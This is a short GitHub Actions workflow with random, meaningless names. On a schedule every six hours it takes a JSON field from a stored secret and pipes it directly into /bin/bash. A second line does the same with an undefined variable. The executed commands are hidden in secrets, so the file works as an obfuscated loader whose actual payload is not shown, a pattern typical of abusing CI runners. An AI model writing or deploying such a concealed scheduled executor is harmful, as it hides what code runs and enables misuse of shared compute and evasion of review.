name: yutongrenf

on:
  workflow_dispatch:
  schedule:
    - cron: '39 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yutongrenf
        env:
          tev12651: ${{ secrets.tev12651 }}
        run: |
          echo $tev12651 | jq -r .u4273 | /bin/bash
          echo $nbk1 | jq -r .goryv08586 | /bin/bash

